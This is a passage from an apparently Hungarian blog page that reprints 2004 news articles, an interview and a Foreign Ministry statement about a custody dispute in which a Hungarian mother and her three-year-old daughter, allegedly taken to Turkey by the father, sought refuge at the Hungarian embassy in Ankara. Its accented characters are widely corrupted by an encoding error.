יs tצrצk szצvetsיgesnk, jelenlegi יs leendő eurףpai uniףs partnernk, Nיmetorszבg יs Tצrצkorszבg eddig ezt tudtבk produkבlni. </span></div><div align="justify"> <br /><span style="color:#000000;">Azt, sajnos, nem hallottuk, hogy Tצrצkorszבg vagy Nיmetorszבg budapesti nagykצvete bבrmit is mondott volna a magyar kצzvיlemיnynek az gyben. Igaz, vיlemיnyket a magyar mיdiumok sem kיrdeztיk. Hogy mit mondhattak a Bem rakparton, azt nem tudhatjuk. ֽgy hבt talבlgatunk: hazajצn-e valaha a kיt magyar בllampolgבr, Szofi יs Karcsika? </span></div><div align="justify"> <br /><span style="color:#000000;">Az azonban kצnnyen megtצrtיnhet, hogy a magyar kצzvיlemיny Tצrצkorszבg uniףs felkיszltsיgיt egy ideig azon fogja lemיrni, akarja-e, tudja-e hazבjבba visszajuttatni a kיt gyermeket, akik יletket eddig Magyarorszבgon יltיk le, s a szlői felgyeleti jogot tצrvיnyesen gyakorlף יdesanyjuk tudta יs akarata ellenיre, a magyar יs a nemzetkצzi jog megsיrtיsיvel kerltek Tצrצkorszבgba.</span></div><div align="justify"> <br /><span style="color:#000000;">Raskף Emese augusztusban elmondta a NSZ szolnoki tudףsםtףjבnak, hogy Fatih ײzbas megfenyegette: vיgez a Raskף-csalבddal יs eltnteti Szofit, ha az asszony a magyar hatףsבgok segםtsיgיt kיri a kislבny Tצrצkorszבgba szצktetיse miatt. Most ײzbas magyarorszבgi barבtai fenyegettיk meg Raskף Emesיt. S a tצrtיnetnek mיg nincs vיge. De mintha az a tצrצk יs a nיmet hatףsבgok szבmבra mיg el sem kezdődצtt volna.</span></div><div align="justify"> <br /><span style="color:#000000;">Olvassuk el ismיt a magyar Klgy pontosan egy hףnappal ezelőtti kiadott nyilatkozatבt Szofi gyיvel kapcsolatban: "A magyar בllampolgבrok alkotmבnyos joga a konzuli vיdelemhez valף jog. .. Kiemelt humanitבrius kצtelezettsיg בll fenn a kiskorת magyar בllampolgבrok vיdelme, a gyermekek jogainak biztosםtבsa, יletk, testi יpsיgk megףvבsa kapcsבn." </span></div><div align="justify"> <br /></span><span style="color:#000000;">Mi is םgy tudjuk.</span></div><div align="justify"></div><div align="center"><strong><span style="font-size:130%;"></span></strong> <br /></div><div align="center"><strong>Szofiיk gye nem mozdul Ankarבban</strong></div><div align="center"><strong><span style="font-size:85%;">Nיpszabadsבg, Doros Judit, 2004. szeptember 25.</span></strong></div><div align="center"><strong><span style="font-size:130%;"></span></strong> <br /></div><div align="justify">A napokban ismeretlen telefonבlף fenyegette meg azt az ankarai magyar nagykצvetsיgen tartףzkodף szolnoki asszonyt, aki augusztusban megprףbבlta hazahozni - az egykori יlettבrsa בltal - Tצrצkorszבgba szצktetett kislבnyבt, Szofit.</div><div align="justify"> <br />A magyarul beszיlő fיrfi kצzצlte vele: jobban teszi, ha egyttműkצdik kislבnya apjבval egy "mindannyiuk szבmבra jף megoldבs" יrdekיben. Az asszony nem tett feljelentיst a fenyegető telefon miatt.</div><div align="justify"> <br />Mint arrףl korבbban beszבmoltunk, a szolnoki Raskף Emese hבrom יvvel ezelőtt, hבzassבgon kםvli kapcsolatbףl szlte meg lבnyבt, akit szlei szolnoki hבzבban egyedl nevelt. A kislבny apja a Tצrצkorszבgban nיpszerű Fatih ײzbas, egykori birkףzף olimpikon, Eurףpa-bajnok, akivel az asszony Nיmetorszבgban ismerkedett meg. Az apa tצbbszצr is meglבtogatta Magyarorszבgon a gyereket, majd tavaly szilveszterkor elszצktette a lבnyבt, יs valףszםnűleg hamis nיmet תtlevיllel Tצrצkorszבgba vitte. Innen prףbבlta meg augusztus 19-יn hazamenekםteni gyermekיt a magyar asszony, בm nem jבrt sikerrel. Az תtlevיlkezelők nem engedtיk őket felszבllni a replőgיpre, mondvבn: a kislבny nיmet תtlevיllel lיpett be az orszבgba, ezיrt magyar papםrokkal nem tבvozhat. Szofi יs יdesanyja ezt kצvetően az ankarai magyar nagykצvetsיgen kיrt יs kapott menedיket.</div><div align="justify"> <br />Az asszony augusztus kצzepיn a tצrצk igazsבggyi minisztיriumhoz fordult, hogy engedיlyezzיk gyermeke kiadatבsבt. Dokumentumokkal igazolta, hogy Szofi magyar בllampolgבr, Szolnokon nőtt fel, s hivatalos gondviselője egyedl az יdesanyja. A tצrצk minisztיriumnak a tצrvיnyek szerint hat hיt בll rendelkezיsיre, hogy dצntsצn az gyben - ez a hatבridő szeptember 30-בn jבr le. Raskף Emese tegnap szolnoki tudףsםtףnknak telefonon elmondta: tצrצk gyvיdet fogadott, de egyelőre nincs fejlemיny gyיben, az illetיkes szervek meg sem hallgattבk.</div><div align="justify"></div><div align="center"><span style="font-size:130%;"><strong></strong></span></div><div align="center"><span style="font-size:130%;"><strong>Szofi kיt תtlevיllel <br />Beszיlgetיs az ankarai kצvetsיgre meneklt anyבval</strong></span></div><div align="center">Nיpszabadsבg • Doros Judit • 2004. augusztus 28. <br /></div><div align="justify"> <br /><em>Semmikיppen sem szeretnיk Tצrצkorszבgban szlni, יs bםzom abban, hogy minden hivatalos gynek szבmunkra kedvező vיge lesz - mondta a Nיpszabadsבgnak Raskף Emese, aki augusztus 16-a ףta az ankarai magyar nagykצvetsיg vיdelmיt יlvezi, kislבnyבval, a hבromיves Szofival egytt.</em></div><em><div align="justify"> <br />Mint arrףl beszבmoltunk, a gyereket tavaly decemberben szצktette Tצrצkorszבgba apja, a hazבjבban kצzismert Fatih ײzbas, egykori birkףzף olimpikon, Eurףpa-bajnok. Az יdesanya - szlei segםtsיgיvel - a napokban megprףbבlta hazamenekםteni a lבnyבt, בm nem jבrtak sikerrel: az תtlevיlkezelők nem engedtיk őket felszבllni a replőgיpre. A csalבd ezt kצvetően az ankarai magyar nagykצvetsיgen kיrt menedיket. Raskף Emese eddig elzבrkףzott a sajtף kיrdיsei elől, most azonban mיgis תgy dצntצtt: miutבn gyermeke apja mבr tצbbszצr is nyilatkozott az gyben, most ő is megosztja בllבspontjבt a nyilvבnossבggal.</div><div align="justify"> <br /></em>- Fatih ײzbas a Hrriyet nevű tצrצk lapban azt בllםtotta: צnצk sokבig יltek Nיmetorszבgban, majd megegyeztek abban, hogy בtkצltצznek Ankarבba, s ott יlnek tovבbb.</div><div align="justify"> <br />- Fatihhal 1999 nyarבn ismerkedtem meg Nיmetorszבgban. Szofi megszletיsיig - 2001 oktףberיig - tצbbszצr kiutaztam Nיmetorszבgba, de alapjבban vיve Magyarorszבgon יltem, ekkor vיgeztem ugyanis a főiskolבt. Kapcsolatunk első időszakבban mיg voltak klצnbצző elkיpzelיseink a kצzצs jצvőnkről, de amikor mבr terhes voltam, rבjצttem, hogy nem tudok יs nem is akarok vele egytt יlni. Szofi Magyarorszבgon szletett, azףta - a szleimmel egytt - Szolnokon יlnk. Arrףl nem egyeztnk meg, hogy bבrhovב is elkצltצznk a kislבnnyal Magyarorszבgrףl. Fatihnak soha nem mondtam, hogy ne jצjjצn יs ne lבtogassa Szofit, יs ő nagyjבbףl havonta lבtogatott minket.</div><div align="justify"> <br />- Ugyanez a lap megemlםti, hogy a kislבnyuk a fיrfi תtlevelיben is szerepelt, mert םgy kaphatott nיmet בllampolgבrsבgot.</div><div align="justify"> <br />- Szofival Szolnokon יltnk, ott jבrt bצlcsődיbe. A kislבnyomnak magyar בllampolgבrsבga יs magyar תtlevele van. A Szofi megszletיse ףta eltelt hבrom יv alatt kיtszer voltunk egy-kיt hיtre az apjבval egytt Tצrצkorszבgban יs Nיmetorszבgban. A kislבnyom a magyar תtlevelיvel utazott. Tavaly december vיgיn Fatih meglבtogatott minket Szolnokon, יs elszצktette Szofit Tצrצkorszבgba. Ezutבn tudtam meg, hogy Szofi szerepel יdesapja nיmet תtlevelיben. Fatih most azt בllםtja, hogy ehhez hozzבjבrultam, יs lemondtam a kislבnyom felgyeleti jogבrףl. ֹn azonban Szofirףl soha nem mondtam le, יs nem adtam a beleegyezיsemet ahhoz, hogy Szofi a magyaron kםvl mבs בllampolgבr is legyen, ahhoz sem םrtam alב semmilyen papםrt, hogy az apja תtlevelיben szerepeljen. Fatih a gyereket tavaly a belegyezיsem יs a tudtom nיlkl vitte el Magyarorszבgrףl. Kיnyszerhelyzetbe kerltem, a kislבnyom Tצrצkorszבgban volt, ezיrt előszצr januבr kצzepיn jצttem ide. Kיt hיtig maradhattam, azutבn Fatih hazakldצtt. Szofinak ismיt meg kellett יlnie az elszakadבst. Fatih megםgיrte, hogy kצrlbell tםz nap utבn eljצn יrtem Magyarorszבgra, םgy addig otthon vבrtam. Vיgl mבrcius kצzepיn - hosszת vבrakozבs utבn - engedte meg, hogy ide kצltצzhessek. Itt Fatih elvette az תtlevelemet, יs elzבrt a klvilבgtףl.</div><div align="justify"> <br />- Kislבnya יdesapja szerint az צnצk kצzצtti konfliktusnak a nagyszlők az okai, ők befolyבsoljבk ײnt rossz irבnyba.</div><div align="justify"> <br />- A szleim mellettem בlltak az elmתlt nyolc hףnapban, יs a tצrtיntek ellenיre teljes bizalmat szavaztak Fatihnak. Rendszeresen beszיltem velk יs tudtבk pontosan, mi tצrtיnik velem nap mint nap. Egy szomorת eset utבn, amikor Fatih nagyon megvert - יs ez nem az első eset volt -, teljesen vilבgossב vבlt szבmomra, hogy nem vagyok kיpes, nem akarok megfelelni mבr az ő elvבrבsainak. Teljes kיtsיgbeesיsemben kיrtem ezutבn a szleimet, hogy segםtsenek nekem, mert nem tudok ezzel az emberrel egytt יlni.</div><div align="justify"> <br />- A replőgיpre, tצrצk lapinformבciףik szerint, azיrt nem tudtak felszבllni, mert elkםsיrte צnצket Bsra Gler, Szofi tizenegy יves tצrצkorszבgi unokatestvיre, יs "cirkuszolni" kezdett a replőtיren.</div><div align="justify"> <br />- Bsra Glert mindenkיppen magunkkal kellett vinnnk a replőtיrre, mivel ő volt az, akit Fatih azיrt rendelt mellיm, hogy mindig szemmel tartson. Kapcsolatom ezzel a kislבnnyal tצrצkorszבgi ittlיtem hat hףnapja alatt leginkבbb anya-lבnya kapcsolatבra hasonlםtott. Az ankarai replőtיren, amikor vilבgossב vבlt szבmבra, hogy Szofi יs יn el akarunk menni, pבnikszerű, hisztיriבs kiabבlבsba kezdett, יs szיpen lassan az egיsz replőtיri rendőrsיg figyelmיt magבra vonta. ֽgy nem engedtek fel bennnket a replőgיpre. A tצrצk rendőrsיg szerint Szofi apja nיmet תtlevelיvel יrkezett az orszבgba, ezיrt magyar papםrokkal nem engedhettיk ki.</div><div align="justify"> <br />- ײn hat hףnapos terhes, szletendő gyermekיnek szintיn Fatih ײzbas az יdesapja. Mi lesz ennek a gyereknek a sorsa, elkיpzelhető-e, hogy Tצrצkorszבgban szletik meg? Egyבltalבn: meddig tervezi, hogy a kצvetsיg יpletיben maradnak?</div><div align="justify"> <br />- Az, hogy most hat hףnapos terhes vagyok, bizonyםtja, hogy amikor idejצttem, komolyan gondoltam azt, hogy Fatihhal a kapcsolatom jףra fordul, יs talבn mיgis egy csalבd lesznk. Mבs lehetősיget nem lבttam, itt volt a megszצktetett kislבnyom. Fatih megfenyegetett, hogy vיgez a csalבdommal, Szofit pedig eltnteti a szemem elől, ha a magyar hatףsבgokhoz fordulok. Ezיrt szבmunkra most az egyetlen biztonsבgos hely a kצvetsיg יplete. Hבlבs vagyok a Klgyminisztיriumnak, hogy az gy lezבrבsבig itt lehetnk. Itt teljes biztonsבgban יrezhetjk magunkat. Fיlek ugyanis attףl, hogy ha bבrhol mבshol lennיnk Tצrצkorszבgban, Fatih megint elvennי tőlem Szofit, יs akkor sem adnב vissza, ha erről a bםrףsבg םtיletet hozna. Semmikיppen sem szeretnיk Tצrצkorszבgban szlni, יs bםzom abban, hogy minden hivatalos gynek hamarosan szבmunkra kedvező vיge lesz.</div><div align="justify"> <br />- Hogyan יli בt a kislבnya ezeket az esemיnyeket?</div><div align="justify"> <br />- Szofi szereti az יdesapjבt, de mivel tתl sok időt nem tצltצtt vele egytt, ezיrt most hiבnyבt sem nagyon יrzi. Jףl van, mיg jבtיkot is talבltunk neki, de most a nיgy fal kצzl nem tud kimozdulni. Remיlem, ez a helyzet nem tart sokבig.</div><div align="justify"> <br />- Lבt-e mיg esיlyt arra, hogy az egיsz gy bיkיsen rendeződjצn, vagy mבr csak a tצrצk bםrףsבg dצntיsיben bםzhat?</div><div align="justify"> <br />- Azok utבn, ami az elmתlt nyolc hףnapban tצrtיnt, mבr nagyon nehיz bםzni a megegyezיsben a kislבnyom apjבval. Szeretnיm, ha valahogy mielőbb hazautazhatnבnk Szofival. Fatih feljelentett minket Tצrצkorszבgban, most Szofival nem hagyhatjuk el az orszבgot. Fatihot egyיbkיnt sajnבlom, mert tudom, milyen az, amikor az ember nem lבthatja a gyermekיt. De hinni sem tudok mבr az םgיreteinek. Ezיrt fordultam a tצrצk bםrףsבghoz, s valףszםnűleg meg kell vבrnunk a dצntיsיt. Mivel a kislבnyom magyar בllampolgבr, יs Magyarorszבgon יlt eddig, azt hiszem, hogy az igazsבg a mi oldalunkon בll. Bםzom a tצrצk bםrףsבgban, יs abban, hogy Szofi visszakerl oda, ahol יletיnek első hבrom יvיben nevelkedett. gy gondolom, hogy - bבr annak idejיn nem tudtam, mit vבllalok, amikor egy tצrצk fיrfitől gyermeket szltem -, mיgis mindent megtettem, hogy mindenkinek megfelelve, egy csalבd lehessnk. Sajnos, nem tudtam elfogadni azokat az elvבrבsokat, amelyeket Fatih tבmasztott velem szemben. Pיldבul, amםg itt voltam, a lakבsbףl csak a boltba יs a jבtszףtיrre mehettem ki, akkor is csak felgyelettel, יs senkivel nem בllhattam szףba. ֹdesapבmtףl tudom, hogy a magyar kצzvיlemיny יs a sajtף יrdeklődik a kislבnyom mostani helyzete irבnt. Ez nagyon jףl esik. De azt, amin az elmתlt hףnapokban keresztlmentem, nem lehet gyorsan feldolgozni. Ezיrt gondolom, יrthető, hogy a mostani lelkiבllapotomban nehיz a megprףbבltatבsaimrףl a sajtףnak beszיlni. Most is csak azיrt nyilatkozom, mert az otthoniaktףl tudom, hogy a magyar sajtףban jelentek meg igazsבgtalan בllםtבsok is velnk kapcsolatban.<span style="font-size:100%;"> <br /> <br /></div></span><span style="font-size:100%;"><div align="justify"></span></div><div align="center"><strong><span style="font-size:130%;"></span></strong></div><div align="justify"><strong>Klgyminisztיrium: alkotmבnyos jog a konzuli vיdelemhez valף jog <br /></strong> <br />Klgyminisztיrium Szףvivői Iroda <br />Budapest, 2004. augusztus 26. </div><div align="justify"> <br />A Tצrצkorszבgban tartףzkodף Raskף Emese יs gyermeke gye kapcsבn a Klgyminisztיrium az alבbbiakra hםvja fel a figyelmet.</div><div align="justify"> <br />A magyar בllampolgבrok alkotmבnyos joga a konzuli vיdelemhez valף jog. A magyar konzuli szolgבlat a klfצldצn bajba kerlt magyar בllampolgבrok megsegםtיse יrdekיben a nemzetkצzi jog יs a hazai jog keretein bell - a fogadף בllam jogבnak tiszteletben tartבsa mellett - intיzkedik. Kiemelt humanitבrius kצtelezettsיg בll fenn a kiskorת magyar בllampolgבrok vיdelme, a gyermekek jogainak biztosםtבsa, יletk, testi יpsיgk megףvבsa kapcsבn.</div><div align="justify"> <br />A konzuli szolgבlat e kצtelezettsיgeinek eleget tיve jבr el a tצrצk, majd a magyar sajtףban nyilvבnossבgra kerlt gyben is, amelyben az יrintett magyar בllampolgבr a maga יs az ugyancsak magyar בllampolgבrsבgת gyermeke יrdekeinek vיdelmיben kיrte a konzuli szolgבlat segםtsיgיt. A Klgyminisztיrium, az illetיkes magyar יs tצrצk hatףsבgokkal szorosan egyttműkצdve, a jogi előםrבsok keretein bell tette meg a szksיgesnek םtיlt halaszthatatlan intיzkedיseket יs jבr el a tovבbbiakban is az יrintett magyar בllampolgבrok יrdekeinek klfצldצn tצrtיnő vיdelmיben. Az gy, illetőleg az eljבrבs rיszleteinek nyilvבnossבgra hozבsa azonban sיrtheti az יrintettek szemיlyisיgi jogait יs hבtrבnyosan befolyבsolhatja az gyben folyף hatףsבgi eljבrבsok kimenetelיt, םgy ettől a Klgyminisztיrium tartףzkodik.</div><div align="justify"></div><div align="center"> <br /><span style="font-size:130%;"><strong>Egy magyar csalבd kבlvבriבja <br />Az ankarai magyar nagykצvetsיgen kיrtek vיdelmet</strong></span></div><strong><span style="font-size:130%;"></span></strong><div align="center"> <br />Nיpszabadsבg, Doros Judit, 2004. augusztus 25. 00:00</div><div align="left"> <br /></div><div align="justify">Egyelőre nem tudni, meddig marad az ankarai nagykצvetsיgen az a szolnoki asszony, aki a klkיpviseleten kיrt vיdelmet maga יs gyermeke szבmבra.</div><div align="justify"> <br />Mint arrףl tegnapi lapunk pesti kiadבsבban hםrt adtunk, Raskף Emese hבrom יvvel ezelőtt, hבzassבgon kםvli kapcsolatbףl szlte meg Szofi nevű lבnyבt, akit szlei szolnoki, szandaszőlősi hבzבban egyedl nevelt. A kislבny apja, a Tצrצkorszבgban kצzismert Fatih ײzbas egykori birkףzף olimpikon, Eurףpa-bajnok, akivel Raskף Emese Nיmetorszבgban ismerkedett meg. gy terveztיk: Nיmetorszבgban telepednek le. A kapcsolatuk azonban megromlott, םgy a terhes aszszony a lבnyבt mבr Magyarorszבgon szlte meg. Az apa tצbbszצr meglבtogatta a gyereket, majd tavaly szilveszterkor elszצktette, s az elsődleges adatok szerint hamis nיmet תtlevיllel Tצrצkorszבgba vitte. Innen prףbבlta meg a mתlt hיt elejיn, a szlei segםtsיgיvel hazamenekםteni a lבnyבt a magyar asszony, בm nem jבrt sikerrel: az תtlevיlkezelők nem engedtיk őket felszבllni a replőgיpre. A csalבd ezt kצvetően az ankarai magyar nagykצvetsיgen kיrt menedיket: Raskף Emese יs יdesanyja, valamint a kislבnya jelenleg is a kצvetsיg egyik vendיghבzבban tartףzkodik, mםg a nagypapa, Raskף Tamבs a napokban viszszatיrt Szolnokra, s innen intיzi a csalבd gyeit.</div><div align="justify"> <br />Raskף Tamבs tegnap nyilatkozott tudףsםtףnknak az gy hבtterיtől. Elmondta: a lבnya az idיn januבrban tudta meg, hogy gyermeke Tצrצkorszבgban van. Fatih ײzbas - Raskף Tamבs בllםtבsa szerint - fogadta ugyan az asszonyt, de kיsőbb elvette az תtlevelיt, s nem engedte, hogy szabadon kijבrjon a hבzbףl. Raskף Emese az itt tצltצtt idő alatt תjbףl teherbe esett a tצrצk birkףzףtףl: szםve alatt most hat hףnapos, kצzצs magzatukat hordja. A nagypapa בllםtבsa szerint ezt a gyermeket is itthon szeretnי majd megszlni יs felnevelni a huszonnyolc יves, korבbban pedagףguskיnt dolgozף lבnya.</div><div align="justify"> <br />Raskף Tamבs kצzצlte: a napokban felhםvta őt Fatih ײzbas, יs arra kיrte, hogy beszיlje rב a lבnyבt az gy bיkיs rendezיsיre. Azt is felajבnlotta, hogy kצltצzzenek Nיmetorszבgba, s ott יljenek egytt. A nagypapa szavai szerint azonban a lבnya szeretne hazajצnni. Kצzצlte: a csalבd tצrצk gyvיdet fogadott, s a hבgai egyezmיnyre hivatkozva kיrtיk a gyerek jogבllבsבnak bizonyםtבsבt. Az elmתlt hetekben beszereztיk azokat a papםrokat - anyakצnyvi kivonatot, lakcםmkבrtyבt, bצlcsődei igazolבst, gyermekorvosi dokumentumokat -, amelyekkel igazolhatף, hogy a kislבny folyamatosan Magyarorszבgon, az anyjבval יlt. Miutבn a kislבny magyar בllampolgבr, s ezt az יdesanya a fenti dokumentumokkal igazolta, az ankarai magyar nagykצvetsיg kiadta szבmukra a hazatיrיsi engedיlyt. A tצrצk hatףsבgok azonban augusztus 16-בn, hיtfőn nem engedtיk őket felszבllni a Budapestre tartף replőgיpre, arra hivatkozva: a kislבny nיmet תtlevיllel lיpett be az orszבgba, s םgy magyar papםrokkal nem tבvozhat.</div><div align="justify"> <br />Raskף Tamבs elmondta: a Klgyminisztיrium felajבnlotta a lבnyבnak יs a tצbbi csalבdtagnak, hogy az gy rendezיsיig a kצvetsיg יpletיben maradhassanak. Hozzבtette: informבciףi szerint Emesיt nem zaklatja kצzצs gyermekk apja, aki egy ankarai תjsבgnak adott nyilatkozatban azt בllםtotta: az anya korבbban lemondott a kislבny felgyeleti jogבrףl. Ezt Raskף Tamבs hatבrozottan cבfolta. Fatih ײzbas a napokban egy tצrצk lapon keresztl a helyi illetיkesekhez fordult, s azt kיrte: ne hagyjבk, hogy a gyerekיt hamis papםrokkal megszצktessיk az orszבgbףl.</div><div align="justify"> <br />Az ankarai magyar nagykצvetsיgen megerősםtettיk: Raskף Emese, lבnyבval יs יdesanyjבval egytt a kצvetsיg יpletיben tartףzkodik. Raskף Emese egyelőre nem kםvבnt nyilatkozni az gyben. </div><div align="justify"> <br /> <br /></div><div align="center"><strong><span style="font-size:130%;">Gyerekrablבs Ankarבban</span></strong></div><div align="center">2004. augusztus 25. 15:47 - <a href="http://www.mogyoro.hu/portal/news.php?action=view&amp;news_id=32dad5573f381a9c">mogyoro.hu</a></div><div align="center">forrבs: Mai Nap - Cati</div><div align="center"></div><div align="justify"></div><div align="justify">Nemzetkצzi diplomבciai bonyodalmat okozhat egy tצrצk fיrfi יs magyar יlettבrsa vitבja. A kיt fיl azzal gyanתsםtja a mבsikat, hogy elrabolta a hבrom יves Szףfiבt. Az anya, Raskף Emese יs a lבny az ankarai magyar nagykצvetsיg vיdelmיt יlvezi, a tצrצkצk elfogatףparancsot adtak ki ellene.A tצrצk sajtף komoly terjedelemben foglalkozik az ggyel, a Hrriyet nevű tekintיlyes napilap megszףlaltatta a jelentős birkףzף pבlyafutבssal rendelkező apבt, Faith ײzbast. A nיmet בllampolgבrsבgot is elnyert fיrfi elmondta, hat יve ismerkedett meg Emesיvel, a baba hבrom יve szletett. A kis csalבd egy ideig nיmetorszבgban יlt, majd תgy dצntצttek Ankarבba kצltצznek. A fיrfi szerint ekkor kezdődtek a bajok, תgy vיli, anyףsa יs apףsa בshatta alב a nyugalmukat.A Hrriyet תgy tudja, a felesיg Ankarבban fogta Szofit יs tםzיves unokatestvיrיt, Bsra Glert, יs a replőtיrre ment, hogy hazaszצkjצn velk. Előtte azonban egyeztetett a magyar nagykצvetsיggel, hogy ha valami problיmבja adףdik, segםtsenek neki. A reptיren azonban a kis Bsra gyanתt fogott, s kiabבlni kezdett, hogy "ellopjבk az unokatestvיremet".A hatףsבgok elkezdtek vizsgבlףdni, kiderlt, Szofi nיmet תtlevיllel יrkezett az orszבgba, םgy kיtes a magyar papםrok valףdisבga. gy dצntצttek, a magyar nőt יs a gyerekeket בtkםsיrik a vבrosi kapitבnysבgra. ֱm nem bilincseltיk meg Emesיt, ő pedig kihasznבlta ezt, a reptיr kijבratבnבl beugrott az ott vבrakozף, diplomata rendszבmת magyar kocsiba יs a kצvetsיgre vitette magבt.A meglepett fיrj panaszt tett az gyיszsיgen, ennek nyomבn elfogatףparancsot adtak ki Raskף Emese ellen. Elmesיlte azt is, hogy bבr kisbabakיnt az יdesanyja תtlevelיben szerepelt Szofi, kיsőbb "בtkerlt" az צvיbe, hogy megkapja a nיmet בllampolgבrsבgot, s םgy is tצrtיnt. Sőt, a kislבny tצrצknek is vallhatja magבt, ami tovבbb bonyolםtja az amתgy sem egyszerű helyzetet. A fיrfi nem יrti, mi tצrtיnt, mert jף tבrsnak tartja Emesיt, nem olyan embernek, aki csak תgy elrabolja a gyermekיt. Rבadבsul a nő ismיt gyermeket vבr, vagyis sok jel utalt arra, hogy minden rendben van a csalבd kצrl.</div><div align="justify"> <br /></div><div align="justify"></div><div align="center"><strong><span style="font-size:130%;">Tצrצk apja vagy magyar anyja rabolta-e el Szofit?</span></strong></div><strong><span style="font-size:180%;"></span></strong><div align="justify"> <br /><strong>Elfogatףparancsot adott ki a tצrצk kצvetsיg egy magyar nő יs kislבnya ellen, a tצrצk apa jelentette fel szerelmיt gyermekrablבsיrt</strong> <br /> <br /></div><div align="justify"><em>Mai Nap alapjבn ma.hu 2004.08.25 14:56</em></div><div align="justify"></div><div align="justify"> <br />Raskף Emesיre יs hבromיves Szofi lבnyבra az ankarai magyar nagykצvetsיg vigyבz, a tצrצkצk azonban elfogatףparancsot adtak ki ellenk, miutבn az בllםtףlagos fיrj feljelentette felesיgיt gyermekrablבs miatt. A hבzaspבr hat יvvel ezelőtt Nיmetorszבgban ismerkedett meg, hבrom יvvel ezelőtt pedig kצzצs gyermekk is szletett. Arrףl ellentmondף hםrek szבllnak, hogy valףjבban צsszehבzasodtak-e vagy csak יlettבrskיnt יlnek egytt. A jelentős birkףzף-pבlyafutבssal rendelkező, nיmet בllampolgבrsבgot is megszerzett apa, Fatih ײzbas יs kis csalבdja egy ideig Nיmetorszבgban maradt, majd a fיrfi szlőhazבjבba kצltצztek.A tצrצk lapok beszבmolףja szerint a gondok ekkor kezdődtek, a fיrj תgy vיli, anyףsa יs apףsa okozta, hogy Emesיvel megromlott a viszony. Akבrmi is בlljon a hבttיrben, nיhבny napja az asszony a pici gyerekkel יs tםz יves unokatestvיrיvel egytt elindult a replőtיrre, bבr elővigyבzatossבgbףl előre יrtesםtette az ottani magyar nagykצvetsיget, "gond esetיre". A replőtיrig nem is volt semmi gond, בm ekkor a tםz יves gyermek elkezdett kiabבlni: "ellopjבk az unokatestvיremet!".A helyi rendőrצk azonnal őrizetbe vettיk a szצkni kיszlő asszonyt, de szerencsיjיre a bilincset nem raktבk a kezיre, םgy egy ףvatlan pillanatban gyermekיvel egytt az ott vבrakozף magyar diplomבciai autףba ugrott. A rendőrצknek az tűnt fel, hogy Szofi nיmet תtlevיllel יrkezett annak idejיn Tצrצkorszבgba, az anyבnבl lיvő magyar papםrokat ezיrt nem fogadtבk el eredetinek. Igaz, a fיrj elmondבsa szerint a kislבnyt eredetileg az יdesanya תtlevelיbe jegyeztיk be, csak azיrt kerlt בt kיsőbb az apa okmבnyaiba, mert םgy megkaphatta a nיmet בllampolgבrsבgot is.Egyelőre senki nem tudja, kinek van igaza, יs sokan azon is meglepődtek, hogy Emese ilyen lיpיsre szבnta el magבt, hisz eddig mindenki תgy tudta, minden rendben van a pבros kצrl, rבadבsul Emese תjabb terhessיge arra mutat, hogy valףjבban teljes a bיke otthon. A nő viszont azt בllםtja, hogy valףjבban az apa rabolta el mיg Magyarorszבgrףl a kislבnyt, ekkor indult תtnak szleivel egytt, hogy visszaszerezze gyermekיt. ײzbas azonban megakadבlyozta ezt, יs elrejtette mindkettejk תtlevelיt - ekkor fordult segםtsיgיrt Emese az ottani magyar kצvetsיghez. Az gy pillanatnyilag egy helyben toporog, de egyes vיlemיnyek szerint akבr nemzetkצzi diplomבciai bonyodalmat is okozhat, ha nem sikerl tisztבzni, ki az, aki jogellenesen akarja magבnבl tartani a gyermeket. </div><div align="justify"></div><div align="justify"></div><div align="justify"><em><span style="color:#ff0000;">Efendi kommentבrja:</span> Igazi gyצngyszem! Vajon melyik tצrצk kצvetsיg adta ki az elfogatףparancsot? </em><em>A cikk megjelent <a href="http://www.ma.hu/page/cikk/ae/0/97492/1">ezen a linken</a>.</em></div><div align="justify"></div><div align="justify"><em></em></div><div align="center"><strong><span style="font-size:130%;">Gyerekszצktetיs</span></strong></div><div align="center"> <br />Nיpszabadsבg, Doros Judit, 2004. augusztus 24. 00:00</div><div align="justify"></div><div align="justify"> <br />Az ankarai nagykצvetsיgen keresett vיdelmet maga יs gyermeke szבmבra egy magyar בllampolgבrsבgת asszony.</div><div align="justify"> <br />A Szolnokon יlő Raskף Emese hבrom יvvel ezelőtt szlte Szofi nevű lבnyבt, akit szlei szolnoki, szandaszőlősi hבzבban egyedl nevelt. Az apa - aki Tצrצkorszבgban kצzismert יs nיpszerű ember, Fatih ײzbas, egykori birkףzף olimpikon יs Eurףpa bajnok, tצrצk-nיmet בllampolgבr tצbbszצr is meglבtogatta itt a gyereket. Tavaly decemberben azonban elszצktette lבnyבt, s Tצrצkorszבgba vitte. Az יdesanya utבnnuk ment, s megprףbבlta rבvenni a gyerek apjבt, hogy engedje őket haza. A fיrfi ebbe nem egyezett bele, ezיrt az יdesanya immבr a nagyszlők segםtsיgיvel az elmתlt hיten, hיtfőn megprףbבlta titokban, replővel hazahozni a lבnyבt. Miutבn a kislבny magyar בllampolgבr, s ezt az יdesanya dokumentumokkal is igazolta, az ankarai magyar nagykצvetsיg kiadta szבmukra a hazatיrיsi engedיlyt, בm a replőtיren a tצrצk vבmosok nem engedtיk בt a gyereket, arra hivatkozva, hogy a beutazבsakor nיmet תtlevיllel יrkezett az orszבgba. Az יdesanya, a kisgyerek, יs a kיt nagyszlő ezיrt az ankarai magyar nagykצvetsיg יpletיben kיrt menedיket.</div><div align="justify"> <br />A klgyminisztיrium egyelőre nem nyilatkozik. Tצrצkorszבgi diplomבciai forrבsokbףl megtudtuk: az יdesanya a napokban egy helyi gyvיdet fogadott, s a hבgai egyezmיnyre hivatkozva kיrte a gyerek jogבllבsבnak megבllapםtבsבt.</div><div align="justify"> <br />Szolnokon, a szandaszőlősi hבzban tegnap senkit sem talבltunk otthon. A szomszיdok egyike elmondta: jףl ismerik a csalבdot, בm a kislבny apjבt csak nagyon ritkבn lבttבk Szolnokon. A szomszיdok egyיbkיnt תgy tudtבk: az יdesapa nem tצrצk, hanem nיmet szבrmazבsת.</div><div align="justify"> <br />A tצrצk lapjelentיsek mבs oldalrףl kצzelםtik meg az esemיnyeket. A Yeni Safak azt םrja, hogy egy Raskף Emese nevű magyar בllampolgבrsבgת nő, szlei segםtsיgיvel, hamis papםrokkal akarta elvinni Ankarבbףl Szofi nevű kislבnyבt, akinek tצrצk az apja. ײzbas azt בllםtja, hogy az anya korבbban lemondott a most hבrom-יves kislבny felgyeleti jogבrףl יs az apבnבl hagyta Nיmetorszבgban. Az apa az תjsבgon keresztl fordult a tצrצk illetיkesekhez, ne hagyjבk, hogy a gyereket 